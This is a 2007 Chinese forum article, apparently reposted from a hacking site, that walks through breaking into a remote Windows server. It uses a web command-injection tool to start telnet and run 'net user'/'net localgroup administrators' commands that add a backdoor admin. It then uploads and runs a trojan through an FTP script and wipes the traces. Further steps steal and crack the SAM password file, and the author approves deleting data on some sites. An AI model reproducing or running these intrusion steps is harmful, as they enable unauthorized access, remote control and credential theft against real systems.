 |
|
| 作者:未知 来源:网上收集 发布时间:2007-3-27 10:39:40 |
|
文章来源:火狐技术论坛
好,该主机存在漏洞,那就拿下他。这次我用另外一个小工具GYSIcmd来打开进入主机的小门,该工具能够利用利用网站程序漏洞运行DOS命令,在注入地址中输入http://168.188.xxx.xxx/read.asp?page=1&no=16,然后在DOS命令中输入net start telnet ,现在已开启了telnet服务,接着执行net user QQ qq123 /add为进入主机添加一个帐号,提升为管理员net localgroup administrators qq /add ,到此已经完成了进入前的准备工作. 下面在为进入主机铺上一条小路,我们好从这上面走过去呀。 在桌面上新建一个CMD快捷方式,指向C:\WINNT\system32\CMD.EXE ,选中属性中的以其他用户身份运行。现在运行该程序,在用户中用我们刚才建立的用户qq(qq123)运行,直接运行telnet 168.188.xxx.xxx ,提示是否发送密码,输入y,这就进入了主机。呵呵,偷偷的进了人家屋里了,该控制了,下面来给它传文件,传个反弹木马,或者开3389,由于我的速度很慢,就不在我机子上开tFTP服务了,直接用一个批处理文件来传送,输入:
一次一行,输入完后就在对方根目录下有了一个文件ftp.txt,下面执行: ftp -s:ftp.txt 在屏幕上可看到一行行的显示执行,你能看到执行的过程,他是看不到的,文件传完了,删除该文件del ftp.txt 运行hack.exe,好,打开我机子上的鸽子,显示有主机上线,呵呵,到手了,任务完成了,想干什么就做吧,不过奉劝一句,不要破坏,即使是国外的机子,要不要删他的数据,除非反华的或者色情站点。如果想更方便的控制,可给他开3389。然后登陆3389进行管理,帮他补上漏洞(作雷锋了).. 在我进入的主机中,碰到的情况是不一样的,有的主机已开了3389,可以利用命令query user 查看主机在线人员,如果管理员在线,通时还有人使用3389登陆到了主机,那么很可能就是已经被人捷足先登了,踢他出去logoff 1 ,怎么办在自己了. 如果传送上去的文件无法运行,那就说明对方已经禁止运行权限,只是允许某个特定的用户有运行权限,这时可以传他的sam文件,进入C:\WINNT\repair>目录,利用FTP的上传功能,来破解他的用户密码。破解sam密码的软件很多,如LC,最近不是出了一款新的,好象叫SAMinside.破解出来密码后,挨着试试,一般不会超过6个用户,定有一个帐户有运行权限。如果都不行,那么还有一个方法...不过该方法虽能运行,但运行后管理员登陆就能发现主机被人入侵,所以就不说了,谁有更好后的办法运行,多多指教。 方法不局限于一点 一个学习网络安全的爱好者 也切忌把自己的思维固定在一点 ,一定要活跃 还要在踏上这条路的时候 一定要学会好好使用搜索引擎和独立思考的习惯\因为你一开始就是一个黑暗中孤独的天使啊\唯一依靠自己才是最好的武器啊 |
| [返回上一页] [打 印] |
|
上一篇文章:black hat2003年黑客大会的精彩入侵课程 | 下一篇文章:网络管理员常见错误集锦 |